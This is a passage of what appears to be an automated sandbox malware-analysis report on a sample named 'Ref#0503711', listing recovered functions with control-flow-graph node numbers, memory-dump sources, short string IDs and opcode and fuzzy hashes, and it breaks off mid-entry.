                                                                Function 060B9468 Relevance: 4.2, Strings: 3, Instructions: 484COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 999 60b9468-60b9490 1001 60b94de-60b94ec 999->1001 1002 60b9492-60b94d9 999->1002 1003 60b94fb 1001->1003 1004 60b94ee-60b94f9 call 60b6f88 1001->1004 1050 60b9935-60b993c 1002->1050 1006 60b94fd-60b9504 1003->1006 1004->1006 1009 60b950a-60b950e 1006->1009 1010 60b95ed-60b95f1 1006->1010 1011 60b993d-60b9965 1009->1011 1012 60b9514-60b9518 1009->1012 1014 60b95f3-60b9602 call 60b5198 1010->1014 1015 60b9647-60b9651 1010->1015 1023 60b996c-60b9996 1011->1023 1017 60b952a-60b9588 call 60b6cc8 call 60b7730 1012->1017 1018 60b951a-60b9524 1012->1018 1027 60b9606-60b960b 1014->1027 1019 60b968a-60b96b0 1015->1019 1020 60b9653-60b9662 call 60b4878 1015->1020 1059 60b99fb-60b9a25 1017->1059 1060 60b958e-60b95e8 1017->1060 1018->1017 1018->1023 1045 60b96bd 1019->1045 1046 60b96b2-60b96bb 1019->1046 1036 60b9668-60b9685 1020->1036 1037 60b999e-60b99b4 1020->1037 1023->1037 1031 60b960d-60b9642 call 60b8f30 1027->1031 1032 60b9604 1027->1032 1031->1050 1032->1027 1036->1050 1062 60b99bc-60b99f4 1037->1062 1052 60b96bf-60b96e7 1045->1052 1046->1052 1064 60b97b8-60b97bc 1052->1064 1065 60b96ed-60b9706 1052->1065 1069 60b9a2f-60b9a35 1059->1069 1070 60b9a27-60b9a2d 1059->1070 1060->1050 1062->1059 1071 60b97be-60b97d7 1064->1071 1072 60b9836-60b9840 1064->1072 1065->1064 1090 60b970c-60b971b call 60b42a0 1065->1090 1070->1069 1077 60b9a36-60b9a73 1070->1077 1071->1072 1094 60b97d9-60b97e8 call 60b42a0 1071->1094 1074 60b989d-60b98a6 1072->1074 1075 60b9842-60b984c 1072->1075 1079 60b98a8-60b98d6 call 60b64c0 call 60b64e0 1074->1079 1080 60b98de-60b992b 1074->1080 1091 60b984e-60b9850 1075->1091 1092 60b9852-60b9864 1075->1092 1079->1080 1100 60b9933 1080->1100 1108 60b971d-60b9723 1090->1108 1109 60b9733-60b9748 1090->1109 1097 60b9866-60b9868 1091->1097 1092->1097 1116 60b97ea-60b97f0 1094->1116 1117 60b9800-60b980b 1094->1117 1105 60b986a-60b986e 1097->1105 1106 60b9896-60b989b 1097->1106 1100->1050 1111 60b988c-60b9891 call 60b30a0 1105->1111 1112 60b9870-60b9889 1105->1112 1106->1074 1106->1075 1118 60b9727-60b9729 1108->1118 1119 60b9725 1108->1119 1122 60b974a-60b9776 call 60b5610 1109->1122 1123 60b977c-60b9785 1109->1123 1111->1106 1112->1111 1126 60b97f2 1116->1126 1127 60b97f4-60b97f6 1116->1127 1117->1059 1128 60b9811-60b9834 1117->1128 1118->1109 1119->1109 1122->1062 1122->1123 1123->1059 1125 60b978b-60b97b2 1123->1125 1125->1064 1125->1090 1126->1117 1127->1117 1128->1072 1128->1094
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Hbq$Hbq$Hbq
                                                                • API String ID: 0-2297679979
                                                                • Opcode ID: d2d497615dc149f2d9d48c7b57973b296c981d66d7ece1f7e6dc4f35dd528c91
                                                                • Instruction ID: 18d9e8e5bfb29ba41be233cb6f39488cdc9a46355cbc4f25e9018d6b5d97b0f8
                                                                • Opcode Fuzzy Hash: d2d497615dc149f2d9d48c7b57973b296c981d66d7ece1f7e6dc4f35dd528c91
                                                                • Instruction Fuzzy Hash: 3D127E30A402158FCBA4DFA9C894AAEBBF6FF89301F14852DD5469B350DB75EC46CB90
                                                                Function 060BF6F0 Relevance: 4.1, Strings: 3, Instructions: 372COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1141 60bf6f0-60bf6f8 1142 60bf6fa-60bf710 1141->1142 1143 60bf738-60bf756 1141->1143 1144 60bf829-60bf84e 1142->1144 1145 60bf716-60bf71a 1142->1145 1152 60bf81e-60bf828 1143->1152 1153 60bf75c-60bf75e 1143->1153 1147 60bf855-60bf87a 1144->1147 1146 60bf720-60bf729 1145->1146 1145->1147 1149 60bf72f 1146->1149 1150 60bf881-60bf8b7 1146->1150 1147->1150 1149->1143 1161 60bf8be-60bf914 1150->1161 1155 60bf77f-60bf781 1153->1155 1156 60bf760-60bf763 1153->1156 1157 60bf784-60bf788 1155->1157 1160 60bf769-60bf773 1156->1160 1156->1161 1163 60bf78a-60bf799 1157->1163 1164 60bf7e9-60bf7f5 1157->1164 1160->1161 1162 60bf779-60bf77d 1160->1162 1181 60bf938-60bf94f 1161->1181 1182 60bf916-60bf92a 1161->1182 1162->1155 1162->1157 1163->1161 1174 60bf79f-60bf7e6 call 60b30d0 1163->1174 1164->1161 1166 60bf7fb-60bf818 call 60b30d0 1164->1166 1166->1152 1166->1153 1174->1164 1190 60bfa40-60bfa50 1181->1190 1191 60bf955-60bfa3b call 60baf30 call 60ba938 * 2 call 60baf70 call 60be738 call 60ba938 call 60bd8d0 call 60bb7d8 1181->1191 1258 60bf92d call 60bfc81 1182->1258 1259 60bf92d call 60bfc90 1182->1259 1189 60bf933 1193 60bfb63-60bfb6e 1189->1193 1202 60bfb3e-60bfb5a call 60ba938 1190->1202 1203 60bfa56-60bfb30 call 60baf30 * 2 call 60bb6e8 call 60ba938 * 2 call 60babe8 call 60bb080 call 60ba938 1190->1203 1191->1190 1199 60bfb9d-60bfbbe call 60bb080 1193->1199 1200 60bfb70-60bfb80 1193->1200 1212 60bfb82-60bfb88 1200->1212 1213 60bfb90-60bfb98 call 60bb7d8 1200->1213 1202->1193 1255 60bfb3b 1203->1255 1256 60bfb32 1203->1256 1212->1213 1213->1199 1255->1202 1256->1255 1258->1189 1259->1189
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$(bq$Hbq
                                                                • API String ID: 0-2835675688
                                                                • Opcode ID: 105d828d7fd6a45a4f551563df14410d9d1a9d1a47ca17cf398a4c06c7fdd083
                                                                • Instruction ID: 2bcdaba9c110d613ba3f2f006c58b9e701a20326d8dfe3612d963fa8a55e33e6
                                                                • Opcode Fuzzy Hash: 105d828d7fd6a45a4f551563df14410d9d1a9d1a47ca17cf398a4c06c7fdd083
                                                                • Instruction Fuzzy Hash: 63E12D34A402199FCB54EFA4D8949DEBBB2FF89301F108569E416AB365DB30EC46CB91
                                                                Function 060BB128 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1260 60bb128-60bb165 1262 60bb187-60bb19d call 60baf30 1260->1262 1263 60bb167-60bb16c call 60bba98 1260->1263 1269 60bb513-60bb527 1262->1269 1270 60bb1a3-60bb1af 1262->1270 1265 60bb172-60bb174 1263->1265 1265->1262 1267 60bb176-60bb17e 1265->1267 1267->1262 1277 60bb567-60bb570 1269->1277 1271 60bb2e0-60bb2e7 1270->1271 1272 60bb1b5-60bb1b8 1270->1272 1274 60bb2ed-60bb2f6 1271->1274 1275 60bb416-60bb47a call 60ba938 call 60bd8d0 1271->1275 1276 60bb1bb-60bb1c4 1272->1276 1274->1275 1278 60bb2fc-60bb408 call 60ba938 call 60baec8 call 60ba938 1274->1278 1327 60bb485-60bb50a call 60ba938 1275->1327 1280 60bb1ca-60bb1de 1276->1280 1281 60bb608 1276->1281 1284 60bb572-60bb579 1277->1284 1285 60bb535-60bb53e 1277->1285 1371 60bb40a 1278->1371 1372 60bb413-60bb414 1278->1372 1294 60bb2d0-60bb2da 1280->1294 1295 60bb1e4-60bb279 call 60baf30 * 2 call 60ba938 call 60baec8 call 60baf70 call 60bb018 call 60bb080 1280->1295 1283 60bb60d-60bb611 1281->1283 1291 60bb61c 1283->1291 1292 60bb613 1283->1292 1288 60bb57b-60bb5be call 60ba938 1284->1288 1289 60bb5c7-60bb5ce 1284->1289 1285->1281 1287 60bb544-60bb556 1285->1287 1307 60bb558-60bb55d 1287->1307 1308 60bb566 1287->1308 1288->1289 1296 60bb5f3-60bb606 1289->1296 1297 60bb5d0-60bb5e0 1289->1297 1303 60bb61d 1291->1303 1292->1291 1294->1271 1294->1276 1350 60bb27b-60bb293 call 60bb018 call 60ba938 call 60babe8 1295->1350 1351 60bb298-60bb2cb call 60bb080 1295->1351 1296->1283 1297->1296 1310 60bb5e2-60bb5ea 1297->1310 1303->1303 1375 60bb560 call 60be061 1307->1375 1376 60bb560 call 60be070 1307->1376 1308->1277 1310->1296 1327->1269 1350->1351 1351->1294 1371->1372 1372->1275 1375->1308 1376->1308
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q$4'^q
                                                                • API String ID: 0-1196845430
                                                                • Opcode ID: b51e6bf5d178b3dcd682d27a4c3399e733ea8639b8bb5d746d9f23a9d1088d3b
                                                                • Instruction ID: c3993bb23ac9eb54ac9cc017c35bdcfd3084af3c3de25ff804bcf3e07315e0ee
                                                                • Opcode Fuzzy Hash: b51e6bf5d178b3dcd682d27a4c3399e733ea8639b8bb5d746d9f23a9d1088d3b
                                                                • Instruction Fuzzy Hash: 11F1E634B50218DFCB48DFA4D998A9DBBB2FF88301F559158E406AB3A5DB35EC42CB50
                                                                Function 05E80D98 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1715782634.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5e80000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q
                                                                • API String ID: 0-2697143702
                                                                • Opcode ID: ff55fb11ff55a7a79b051e16659c7437fd52fa6e864aecaf58a39af751efcef8
                                                                • Instruction ID: a60cbead93e1277523233818bc839473d55b2624399bed5dee2c6ea62eac651c
                                                                • Opcode Fuzzy Hash: ff55fb11ff55a7a79b051e16659c7437fd52fa6e864aecaf58a39af751efcef8
                                                                • Instruction Fuzzy Hash: C6420434E44219CFDB18EB94C888AFEBBB6FB48305F10A059E99A6B354D7345886CF50
                                                                Function 05E818C0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2067 5e818c0-5e818e8 2068 5e818ea 2067->2068 2069 5e818ef-5e81918 2067->2069 2068->2069 2070 5e81939 2069->2070 2071 5e8191a-5e81923 2069->2071 2072 5e8193c-5e81940 2070->2072 2073 5e8192a-5e8192d 2071->2073 2074 5e81925-5e81928 2071->2074 2075 5e81cf7-5e81d0e 2072->2075 2076 5e81937 2073->2076 2074->2076 2078 5e81d14-5e81d18 2075->2078 2079 5e81945-5e81949 2075->2079 2076->2072 2080 5e81d1a-5e81d4a 2078->2080 2081 5e81d4d-5e81d51 2078->2081 2082 5e8194b-5e819a8 2079->2082 2083 5e8194e-5e81952 2079->2083 2080->2081 2087 5e81d72 2081->2087 2088 5e81d53-5e81d5c 2081->2088 2090 5e819aa-5e81a1b 2082->2090 2091 5e819ad-5e819b1 2082->2091 2085 5e8197b-5e8199f 2083->2085 2086 5e81954-5e81978 2083->2086 2085->2075 2086->2085 2094 5e81d75-5e81d7b 2087->2094 2092 5e81d5e-5e81d61 2088->2092 2093 5e81d63-5e81d66 2088->2093 2102 5e81a1d-5e81a7a 2090->2102 2103 5e81a20-5e81a24 2090->2103 2097 5e819da-5e819eb 2091->2097 2098 5e819b3-5e819d7 2091->2098 2100 5e81d70 2092->2100 2093->2100 2115 5e819f4-5e81a01 2097->2115 2098->2097 2100->2094 2111 5e81a7c-5e81ad8 2102->2111 2112 5e81a7f-5e81a83 2102->2112 2106 5e81a4d-5e81a71 2103->2106 2107 5e81a26-5e81a4a 2103->2107 2106->2075 2107->2106 2124 5e81ada-5e81b3c 2111->2124 2125 5e81add-5e81ae1 2111->2125 2117 5e81aac-5e81acf 2112->2117 2118 5e81a85-5e81aa9 2112->2118 2122 5e81a11-5e81a12 2115->2122 2123 5e81a03-5e81a09 2115->2123 2117->2075 2118->2117 2122->2075 2123->2122 2134 5e81b3e-5e81ba0 2124->2134 2135 5e81b41-5e81b45 2124->2135 2129 5e81b0a-5e81b22 2125->2129 2130 5e81ae3-5e81b07 2125->2130 2144 5e81b32-5e81b33 2129->2144 2145 5e81b24-5e81b2a 2129->2145 2130->2129 2146 5e81ba2-5e81c04 2134->2146 2147 5e81ba5-5e81ba9 2134->2147 2138 5e81b6e-5e81b86 2135->2138 2139 5e81b47-5e81b6b 2135->2139 2155 5e81b88-5e81b8e 2138->2155 2156 5e81b96-5e81b97 2138->2156 2139->2138 2144->2075 2145->2144 2157 5e81c09-5e81c0d 2146->2157 2158 5e81c06-5e81c68 2146->2158 2149 5e81bab-5e81bcf 2147->2149 2150 5e81bd2-5e81bea 2147->2150 2149->2150 2166 5e81bfa-5e81bfb 2150->2166 2167 5e81bec-5e81bf2 2150->2167 2155->2156 2156->2075 2160 5e81c0f-5e81c33 2157->2160 2161 5e81c36-5e81c4e 2157->2161 2168 5e81c6a-5e81cc3 2158->2168 2169 5e81c6d-5e81c71 2158->2169 2160->2161 2177 5e81c5e-5e81c5f 2161->2177 2178 5e81c50-5e81c56 2161->2178 2166->2075 2167->2166 2179 5e81cec-5e81cef 2168->2179 2180 5e81cc5-5e81ce9 2168->2180 2171 5e81c9a-5e81cbd 2169->2171 2172 5e81c73-5e81c97 2169->2172 2171->2075 2172->2171 2177->2075 2178->2177 2179->2075 2180->2179
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1715782634.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5e80000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q
                                                                • API String ID: 0-2697143702
                                                                • Opcode ID: bcb0d1f838cc4e5070f024d0bda6cfa9d29e60b511c2002ce5be5f785766977b
                                                                • Instruction ID: da98510f8c5d5519dbca79e4136d1d1545ac723d5443cc47693aea9d3e3f584c
                                                                • Opcode Fuzzy Hash: bcb0d1f838cc4e5070f024d0bda6cfa9d29e60b511c2002ce5be5f785766977b
                                                                • Instruction Fuzzy Hash: E9F1D334D45218DFCB58EFA4E4946ACBBB7FF49316F205469E45AAB350DB346982CF00
                                                                Function 060B8B18 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2268 60b8b18-60b8b2a 2269 60b8b2c-60b8b4d 2268->2269 2270 60b8b54-60b8b58 2268->2270 2269->2270 2271 60b8b5a-60b8b5c 2270->2271 2272 60b8b64-60b8b73 2270->2272 2271->2272 2273 60b8b7f-60b8bab 2272->2273 2274 60b8b75 2272->2274 2278 60b8dd8-60b8e1f 2273->2278 2279 60b8bb1-60b8bb7 2273->2279 2274->2273 2308 60b8e21 2278->2308 2309 60b8e35-60b8e41 2278->2309 2281 60b8c89-60b8c8d 2279->2281 2282 60b8bbd-60b8bc3 2279->2282 2284 60b8c8f-60b8c98 2281->2284 2285 60b8cb0-60b8cb9 2281->2285 2282->2278 2283 60b8bc9-60b8bd6 2282->2283 2287 60b8c68-60b8c71 2283->2287 2288 60b8bdc-60b8be5 2283->2288 2284->2278 2289 60b8c9e-60b8cae 2284->2289 2290 60b8cbb-60b8cdb 2285->2290 2291 60b8cde-60b8ce1 2285->2291 2287->2278 2295 60b8c77-60b8c83 2287->2295 2288->2278 2293 60b8beb-60b8c03 2288->2293 2294 60b8ce4-60b8cea 2289->2294 2290->2291 2291->2294 2296 60b8c0f-60b8c21 2293->2296 2297 60b8c05 2293->2297 2294->2278 2298 60b8cf0-60b8d03 2294->2298 2295->2281 2295->2282 2296->2287 2307 60b8c23-60b8c29 2296->2307 2297->2296 2298->2278 2301 60b8d09-60b8d19 2298->2301 2301->2278 2303 60b8d1f-60b8d2c 2301->2303 2303->2278 2306 60b8d32-60b8d47 2303->2306 2306->2278 2319 60b8d4d-60b8d70 2306->2319 2310 60b8c2b 2307->2310 2311 60b8c35-60b8c3b 2307->2311 2312 60b8e24-60b8e26 2308->2312 2314 60b8e4d-60b8e69 2309->2314 2315 60b8e43 2309->2315 2310->2311 2311->2278 2316 60b8c41-60b8c65 2311->2316 2317 60b8e6a-60b8e97 call 60b42a0 2312->2317 2318 60b8e28-60b8e33 2312->2318 2315->2314 2330 60b8e99-60b8e9f 2317->2330 2331 60b8eaf-60b8eb1 2317->2331 2318->2309 2318->2312 2319->2278 2325 60b8d72-60b8d7d 2319->2325 2328 60b8d7f-60b8d89 2325->2328 2329 60b8dce-60b8dd5 2325->2329 2328->2329 2335 60b8d8b-60b8da1 2328->2335 2332 60b8ea3-60b8ea5 2330->2332 2333 60b8ea1 2330->2333 2354 60b8eb3 call 60ba0f3 2331->2354 2355 60b8eb3 call 60b8f30 2331->2355 2332->2331 2333->2331 2340 60b8dad-60b8dc6 2335->2340 2341 60b8da3 2335->2341 2336 60b8eb9-60b8ebd 2337 60b8f08-60b8f18 2336->2337 2338 60b8ebf-60b8ed6 2336->2338 2338->2337 2346 60b8ed8-60b8ee2 2338->2346 2340->2329 2341->2340 2349 60b8ef5-60b8f05 2346->2349 2350 60b8ee4-60b8ef3 2346->2350 2350->2349 2354->2336 2355->2336
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$d
                                                                • API String ID: 0-3334038649
                                                                • Opcode ID: 7a5dac255a59b8475ec05928c78de8629d7ea88a9c440ba70f1b481ed2ae5ddf
                                                                • Instruction ID: e3ab693bcf5e548e65c0e2306b641db925d84b665a2c00410d5350c65a8cf874
                                                                • Opcode Fuzzy Hash: 7a5dac255a59b8475ec05928c78de8629d7ea88a9c440ba70f1b481ed2ae5ddf
                                                                • Instruction Fuzzy Hash: 9BD15C307406068FCB55CF29C4809AABBF6FF89310B55C96AE45A9B365DB30FC46CB90
                                                                Function 05E82490 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2356 5e82490-5e824b5 2357 5e824bc-5e824de 2356->2357 2358 5e824b7 2356->2358 2359 5e824ff 2357->2359 2360 5e824e0-5e824e9 2357->2360 2358->2357 2363 5e82502-5e82506 2359->2363 2361 5e824eb-5e824ee 2360->2361 2362 5e824f0-5e824f3 2360->2362 2364 5e824fd 2361->2364 2362->2364 2365 5e827bc-5e827d3 2363->2365 2364->2363 2367 5e827d9-5e827dd 2365->2367 2368 5e8250b-5e8250f 2365->2368 2371 5e827df-5e82803 2367->2371 2372 5e82806-5e8280a 2367->2372 2369 5e82511-5e825ae 2368->2369 2370 5e82517-5e8251b 2368->2370 2379 5e825b0-5e8264d 2369->2379 2380 5e825b6-5e825ba 2369->2380 2373 5e8251d-5e8252a 2370->2373 2374 5e82544-5e82569 2370->2374 2371->2372 2375 5e8282b 2372->2375 2376 5e8280c-5e82815 2372->2376 2397 5e82533-5e82541 2373->2397 2403 5e8258a 2374->2403 2404 5e8256b-5e82574 2374->2404 2383 5e8282e-5e82834 2375->2383 2381 5e8281c-5e8281f 2376->2381 2382 5e82817-5e8281a 2376->2382 2390 5e8264f-5e826ec 2379->2390 2391 5e82655-5e82659 2379->2391 2386 5e825bc-5e825e0 2380->2386 2387 5e825e3-5e82608 2380->2387 2389 5e82829 2381->2389 2382->2389 2386->2387 2420 5e82629 2387->2420 2421 5e8260a-5e82613 2387->2421 2389->2383 2401 5e826ee-5e82788 2390->2401 2402 5e826f4-5e826f8 2390->2402 2394 5e8265b-5e8267f 2391->2394 2395 5e82682-5e826a7 2391->2395 2394->2395 2435 5e826c8 2395->2435 2436 5e826a9-5e826b2 2395->2436 2397->2374 2416 5e8278a-5e827ae 2401->2416 2417 5e827b1-5e827b4 2401->2417 2410 5e826fa-5e8271e 2402->2410 2411 5e82721-5e82746 2402->2411 2405 5e8258d-5e82594 2403->2405 2414 5e8257b-5e8257e 2404->2414 2415 5e82576-5e82579 2404->2415 2418 5e825a4-5e825a5 2405->2418 2419 5e82596-5e8259c 2405->2419 2410->2411 2447 5e82748-5e82751 2411->2447 2448 5e82767 2411->2448 2422 5e82588 2414->2422 2415->2422 2416->2417 2417->2365 2418->2365 2419->2418 2429 5e8262c-5e82633 2420->2429 2427 5e8261a-5e8261d 2421->2427 2428 5e82615-5e82618 2421->2428 2422->2405 2432 5e82627 2427->2432 2428->2432 2433 5e82643-5e82644 2429->2433 2434 5e82635-5e8263b 2429->2434 2432->2429 2433->2365 2434->2433 2441 5e826cb-5e826d2 2435->2441 2439 5e826b9-5e826bc 2436->2439 2440 5e826b4-5e826b7 2436->2440 2443 5e826c6 2439->2443 2440->2443 2444 5e826e2-5e826e3 2441->2444 2445 5e826d4-5e826da 2441->2445 2443->2441 2444->2365 2445->2444 2450 5e82758-5e8275b 2447->2450 2451 5e82753-5e82756 2447->2451 2452 5e8276a-5e82771 2448->2452 2454 5e82765 2450->2454 2451->2454 2455 5e82781-5e82782 2452->2455 2456 5e82773-5e82779 2452->2456 2454->2452 2455->2365 2456->2455
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1715782634.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5e80000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q
                                                                • API String ID: 0-2697143702
                                                                • Opcode ID: 2e798da1e358d0f1d5d729e179a3ffae11cd5fc09d7a32fb42ad793cb22ba335
                                                                • Instruction ID: e9f5205332d37e913f0d2cbff61e2f0fd7c40942650ad9734288815c27d79e4e
                                                                • Opcode Fuzzy Hash: 2e798da1e358d0f1d5d729e179a3ffae11cd5fc09d7a32fb42ad793cb22ba335
                                                                • Instruction Fuzzy Hash: F8C12238E40219CFDB08EFA5D4446FDBBB6FB88306F109469E65A6B350CB359886CF50
                                                                Function 060B7548 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$(bq
                                                                • API String ID: 0-4224401849
                                                                • Opcode ID: a1fc99ea0716a934c4407ca4f621105d704d20b3b1f2bbffa8d88486bb3ff2e6
                                                                • Instruction ID: 092c964be19b6674deb8491c9dae750368b10e93e51394ce8e6c0d96c591f6d3
                                                                • Opcode Fuzzy Hash: a1fc99ea0716a934c4407ca4f621105d704d20b3b1f2bbffa8d88486bb3ff2e6
                                                                • Instruction Fuzzy Hash: 8951CA317442459FCB59DF29D890AAE7BA6EFC4341F208169E906CB3A1CF35DC46CBA1
                                                                Function 060B4F98 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$Hbq
                                                                • API String ID: 0-4081012451
                                                                • Opcode ID: 573980a5977209e62292330d1cf19e8dea3f6c296d5ddbceabcff0faab77501d
                                                                • Instruction ID: 53b4b23879de18a9496322f345a7ab3400a996395bbd9b4e512fcf2766278294
                                                                • Opcode Fuzzy Hash: 573980a5977209e62292330d1cf19e8dea3f6c296d5ddbceabcff0faab77501d
                                                                • Instruction Fuzzy Hash: F2517930B402558FCB59AF38C89456EBBB7EFD5241B2485ACD5068B3A1CF35EC06CBA5
                                                                Function 060B16C8 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$Hbq
                                                                • API String ID: 0-4081012451
                                                                • Opcode ID: 0b6b5ebfd42980a2636b836249cfe9e64beaeb4854e4fe2aaee7e53cea6cfa9b
                                                                • Instruction ID: e754272bd9a0a2298e8d561ef512e6ea3dd53849e02fa487be69ccfff03197ec
                                                                • Opcode Fuzzy Hash: 0b6b5ebfd42980a2636b836249cfe9e64beaeb4854e4fe2aaee7e53cea6cfa9b
                                                                • Instruction Fuzzy Hash: 1B51DF306447418FD765DF3AC4A028ABBF6EF85310F14CA6ED0868B7A1DB74E945CB91
                                                                Function 060BA710 Relevance: 2.6, Strings: 2, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$pbq
                                                                • API String ID: 0-3872760177
                                                                • Opcode ID: da8896bd68193d4957850c4bd5c909764a83399e88b6b2b5f2f519f152d959f8
                                                                • Instruction ID: 6260bb5c9c27dce9f06d43db2f977e6ef29bc6be1452b66e27042d77e8eb937f
                                                                • Opcode Fuzzy Hash: da8896bd68193d4957850c4bd5c909764a83399e88b6b2b5f2f519f152d959f8
                                                                • Instruction Fuzzy Hash: 1341EF31A802458FC744DB68C9807AEBBF6FF84300F108929C4499B369DB71A94ACBA1
                                                                Function 019743F5 Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Te^q$lqq
                                                                • API String ID: 0-968188838
                                                                • Opcode ID: f8a1e5999fcaa6f0b326b846e66b050b998266941e4b3e36e40cbb7caec16974
                                                                • Instruction ID: 603e08e0b4cbb82e4db7254d701ef171e0c90ec778e4caa3025ad0746987f503
                                                                • Opcode Fuzzy Hash: f8a1e5999fcaa6f0b326b846e66b050b998266941e4b3e36e40cbb7caec16974
                                                                • Instruction Fuzzy Hash: 3D312830B0410A8FCB069B28C49866DBBE2BF85B10F140869E405EF37ADA658C48CBD1
                                                                Function 060A0510 Relevance: 2.6, Strings: 2, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq$Hbq
                                                                • API String ID: 0-4081012451
                                                                • Opcode ID: 2c10154b859ead89c7f2f7a34820b7cc310232597ba79dd4a0ae38cb8566fa47
                                                                • Instruction ID: 346db93c6cbf76f675e166ccb8e3baee210aa057035e375a7fad61e801cba7a6
                                                                • Opcode Fuzzy Hash: 2c10154b859ead89c7f2f7a34820b7cc310232597ba79dd4a0ae38cb8566fa47
                                                                • Instruction Fuzzy Hash: B221F3317042449FCB45EBB9C84059EBFEBEFC6340B1441AAD50ACF362DE309D0A87A6
                                                                Function 060ABA38 Relevance: 2.6, Strings: 2, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
